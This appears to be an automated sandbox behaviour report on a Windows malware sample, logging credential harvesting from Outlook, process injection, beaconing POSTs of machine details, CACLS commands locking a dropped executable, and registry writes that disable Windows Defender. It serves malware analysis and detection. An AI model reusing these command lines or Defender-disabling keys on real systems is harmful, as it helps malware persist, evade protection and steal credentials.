RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x00000514 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x0000040c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x0000040c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x0000040c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x0000040c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x0000040c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x0000040c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x0000040c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x0000040c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x0000040c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x0000040c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x0000040c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW Nov. 3, 2023, 12:04 p.m.	key_handle: 0x0000040c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1

Harvests credentials from local email clients (1 event)

registry

HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network activity contains more than one unique useragent (3 events)

process	AppLaunch.exe	useragent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
process	explothe.exe	useragent
process	iexplore.exe	useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (20 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2324 called NtSetContextThread to modify thread in remote process 2440
Process injection	Process 2500 called NtSetContextThread to modify thread in remote process 2552
Process injection	Process 2680 called NtSetContextThread to modify thread in remote process 2820
Process injection	Process 2424 called NtSetContextThread to modify thread in remote process 3160
Process injection	Process 4060 called NtSetContextThread to modify thread in remote process 3264
Process injection	Process 1668 called NtSetContextThread to modify thread in remote process 1664
Process injection	Process 3132 called NtSetContextThread to modify thread in remote process 4136
Process injection	Process 4928 called NtSetContextThread to modify thread in remote process 4152
Process injection	Process 5116 called NtSetContextThread to modify thread in remote process 1800
Process injection	Process 4708 called NtSetContextThread to modify thread in remote process 3496
NtSetContextThread Nov. 3, 2023, 12:03 p.m.	registers.eip: 2005598660 registers.esp: 4062636 registers.edi: 0 registers.eax: 4211454 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000012c process_identifier: 2440	1	0	0
NtSetContextThread Nov. 3, 2023, 12:03 p.m.	registers.eip: 2005598660 registers.esp: 2227860 registers.edi: 0 registers.eax: 4198977 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000118 process_identifier: 2552	1	0	0
NtSetContextThread Nov. 3, 2023, 12:03 p.m.	registers.eip: 2005598660 registers.esp: 2816444 registers.edi: 0 registers.eax: 4382478 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000124 process_identifier: 2820	1	0	0
NtSetContextThread Nov. 3, 2023, 12:03 p.m.	registers.eip: 2005598660 registers.esp: 3669500 registers.edi: 0 registers.eax: 4207172 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000118 process_identifier: 3160	1	0	0
NtSetContextThread Nov. 3, 2023, 12:03 p.m.	registers.eip: 2005598660 registers.esp: 1964576 registers.edi: 0 registers.eax: 4198977 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000118 process_identifier: 3264	1	0	0
NtSetContextThread Nov. 3, 2023, 12:04 p.m.	registers.eip: 2005598660 registers.esp: 2489056 registers.edi: 0 registers.eax: 4198977 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000118 process_identifier: 1664	1	0	0
NtSetContextThread Nov. 3, 2023, 12:04 p.m.	registers.eip: 2005598660 registers.esp: 3931380 registers.edi: 0 registers.eax: 4198977 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000118 process_identifier: 4136	1	0	0
NtSetContextThread Nov. 3, 2023, 12:04 p.m.	registers.eip: 2005598660 registers.esp: 3537784 registers.edi: 0 registers.eax: 4382478 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000118 process_identifier: 4152	1	0	0
NtSetContextThread Nov. 3, 2023, 12:04 p.m.	registers.eip: 2005598660 registers.esp: 2619448 registers.edi: 0 registers.eax: 4207172 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000118 process_identifier: 1800	1	0	0
NtSetContextThread Nov. 3, 2023, 12:04 p.m.	registers.eip: 2005598660 registers.esp: 1374432 registers.edi: 0 registers.eax: 4382478 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000118 process_identifier: 3496	1	0	0

One or more non-whitelisted processes were created (6 events)

parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1064,6372096254765179779,13293001815919977938,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1072 /prefetch:2
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x138,0x13c,0x140,0x10c,0x144,0x7fef3046e00,0x7fef3046e10,0x7fef3046e20
parent_process	powershell.exe	martian_process	iexplore https://accounts.google.com/
parent_process	powershell.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com/
parent_process	powershell.exe	martian_process	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" https://accounts.google.com/
parent_process	powershell.exe	martian_process	Chrome https://accounts.google.com/

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (12 events)

Time & API	Arguments	Status	Return
HttpSendRequestA Nov. 3, 2023, 12:03 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0	1	1
HttpSendRequestA Nov. 3, 2023, 12:03 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0	1	1
HttpSendRequestA Nov. 3, 2023, 12:03 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0	1	1
HttpSendRequestA Nov. 3, 2023, 12:03 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0	1	1
HttpSendRequestA Nov. 3, 2023, 12:03 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0	1	1
HttpSendRequestA Nov. 3, 2023, 12:03 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0	1	1
HttpSendRequestA Nov. 3, 2023, 12:03 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0	1	1
HttpSendRequestA Nov. 3, 2023, 12:03 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0	1	1
HttpSendRequestA Nov. 3, 2023, 12:03 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0	1	1
HttpSendRequestA Nov. 3, 2023, 12:03 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0	1	1
HttpSendRequestA Nov. 3, 2023, 12:03 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0	1	1
HttpSendRequestA Nov. 3, 2023, 12:03 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0	1	1

Resumed a suspended thread in a remote process potentially indicative of process injection (50 out of 57 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2324 resumed a thread in remote process 2440
Process injection	Process 2500 resumed a thread in remote process 2552
Process injection	Process 2680 resumed a thread in remote process 2820
Process injection	Process 3056 resumed a thread in remote process 2264
Process injection	Process 3048 resumed a thread in remote process 2548
Process injection	Process 3048 resumed a thread in remote process 3816
Process injection	Process 3048 resumed a thread in remote process 3212
Process injection	Process 3048 resumed a thread in remote process 5024
Process injection	Process 2424 resumed a thread in remote process 3160
Process injection	Process 3120 resumed a thread in remote process 3348
Process injection	Process 3468 resumed a thread in remote process 3228
Process injection	Process 4060 resumed a thread in remote process 3264
Process injection	Process 1668 resumed a thread in remote process 1664
Process injection	Process 3132 resumed a thread in remote process 4136
Process injection	Process 4928 resumed a thread in remote process 4152
NtResumeThread Nov. 3, 2023, 12:03 p.m.	thread_handle: 0x0000012c suspend_count: 1 process_identifier: 2440	1	0	0
NtResumeThread Nov. 3, 2023, 12:03 p.m.	thread_handle: 0x00000118 suspend_count: 1 process_identifier: 2552	1	0	0
NtResumeThread Nov. 3, 2023, 12:03 p.m.	thread_handle: 0x00000124 suspend_count: 1 process_identifier: 2820	1	0	0
NtResumeThread Nov. 3, 2023, 12:03 p.m.	thread_handle: 0x0000025c suspend_count: 1 process_identifier: 2264	1	0	0
NtResumeThread Nov. 3, 2023, 12:03 p.m.	thread_handle: 0x00000340 suspend_count: 1 process_identifier: 2548	1	0	0
NtResumeThread Nov. 3, 2023, 12:03 p.m.	thread_handle: 0x00000754 suspend_count: 1 process_identifier: 3816	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x000007bc suspend_count: 1 process_identifier: 3212	1	0	0
NtResumeThread Nov. 3, 2023, 12:05 p.m.	thread_handle: 0x00000838 suspend_count: 1 process_identifier: 5024	1	0	0
NtResumeThread Nov. 3, 2023, 12:03 p.m.	thread_handle: 0x00000118 suspend_count: 1 process_identifier: 3160	1	0	0
NtResumeThread Nov. 3, 2023, 12:03 p.m.	thread_handle: 0x0000039c suspend_count: 1 process_identifier: 3348	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x0000000000000168 suspend_count: 2 process_identifier: 3228	1	0	0
NtResumeThread Nov. 3, 2023, 12:03 p.m.	thread_handle: 0x00000118 suspend_count: 1 process_identifier: 3264	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x00000118 suspend_count: 1 process_identifier: 1664	1	0	0
NtResumeThread Nov. 3, 2023, 12:04 p.m.	thread_handle: 0x00000118 suspend_count: 1 process_identifier: 4136	1	0	0

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	CACLS "explothe.exe" /P "test22:R" /E
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y\|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
cmdline	cmd /k echo Y\|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y\|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
cmdline	CACLS "..\fefffe8cea" /P "test22:N"
cmdline	CACLS "..\fefffe8cea" /P "test22:R" /E
cmdline	CACLS "explothe.exe" /P "test22:N"

Disables Windows Security features (6 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

Executed a process and injected code into it, probably while unpacking (50 out of 399 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Nov. 3, 2023, 12:03 p.m.	thread_identifier: 2060 thread_handle: 0x0000001c process_identifier: 2056 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\wO6Ck20.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000128	1	1
CreateProcessInternalW Nov. 3, 2023, 12:03 p.m.	thread_identifier: 3060 thread_handle: 0x00000128 process_identifier: 3056 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7YD3dv41.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000001c	1	1
CreateProcessInternalW Nov. 3, 2023, 12:03 p.m.	thread_identifier: 2128 thread_handle: 0x0000001c process_identifier: 2124 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\Nv3yt53.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000128	1	1
CreateProcessInternalW Nov. 3, 2023, 12:03 p.m.	thread_identifier: 3004 thread_handle: 0x00000128 process_identifier: 3000 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\6JR6gF0.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000001c	1	1
